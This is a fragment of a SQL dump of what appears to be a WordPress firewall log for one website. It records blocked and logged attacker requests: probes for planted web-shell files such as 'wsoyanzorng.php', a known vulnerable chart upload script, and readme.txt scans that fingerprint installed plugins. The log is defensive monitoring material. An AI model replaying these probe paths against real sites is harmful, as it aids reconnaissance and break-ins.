User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(12391,1674920314.735452,1674920314.604600,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12392,1674920313.164591,1674920313.047200,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/pki-validation/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL3BraS12YWxpZGF0aW9uLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12393,1674920310.905653,1674920310.776000,'\0\0\0\0\0\0\0\0\0\0��R��',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(12394,1674924686.954786,1674924686.798300,'\0\0\0\0\0\0\0\0\0\0��U�h�',0,403,0,0,0,'https://www.dailyjolly.co.uk/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NjeC9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12395,1674924682.177663,1674924682.046300,'\0\0\0\0\0\0\0\0\0\0��U�h�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jY3gvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12396,1674924668.405685,1674924668.275800,'\0\0\0\0\0\0\0\0\0\0��U�h�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12397,1674924660.029668,1674924659.903000,'\0\0\0\0\0\0\0\0\0\0��U�h�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12398,1674930745.822783,1674930745.659600,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12399,1674930739.859087,1674930739.729800,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3NveWFuem9ybmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12400,1674930732.636163,1674930732.507800,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12401,1674930722.145417,1674930722.016500,'\0\0\0\0\0\0\0\0\0\0��Jо�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12402,1674937395.758832,1674937395.629800,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12403,1674953177.863041,1674953177.731800,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zcGFtdGFzay9jaGFydC9waHAtb2ZjLWxpYnJhcnkvb2ZjX3VwbG9hZF9pbWFnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12404,1674977946.227429,1674977946.098300,'\0\0\0\0\0\0\0\0\0\0��e�q�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12405,1674977910.338100,1674977910.197200,'\0\0\0\0\0\0\0\0\0\0��e�q�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12406,1674981299.555756,1674981299.434800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12407,1674981299.555637,1674981299.434800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12408,1674981304.594453,1674981304.489100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ulisting/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12409,1674981304.594351,1674981304.489100,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ulisting/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bGlzdGluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12410,1674981324.334338,1674981324.223200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12411,1674981324.334215,1674981324.223200,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/sitemap-by-click5/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlbWFwLWJ5LWNsaWNrNS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12412,1674981329.396815,1674981329.244500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12413,1674981329.396646,1674981329.244500,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/woo-refund-and-exchange-lite/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b28tcmVmdW5kLWFuZC1leGNoYW5nZS1saXRlL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12414,1674981345.196738,1674981345.058000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-learning/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12415,1674981345.196603,1674981345.058000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-learning/readme.txt','https://www.google.com/search?','Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/107.0.5304.101 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1sZWFybmluZy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12416,1674981361.173781,1674981361.048000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-donations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12417,1674981361.173658,1674981361.048000,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/nd-donations/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9uZC1kb25hdGlvbnMvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12418,1674981371.911026,1674981371.790800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/armember-membership/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12419,1674981371.910907,1674981371.790800,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/armember-membership/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcm1lbWJlci1tZW1iZXJzaGlwL3JlYWRtZS50eHQ=\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12420,1674981392.835874,1674981392.715700,'\0\0\0\0\0\0\0\0\0\0��t�w8',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/alphabetic-pagination/readme.txt','https://www.google.com/search?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log 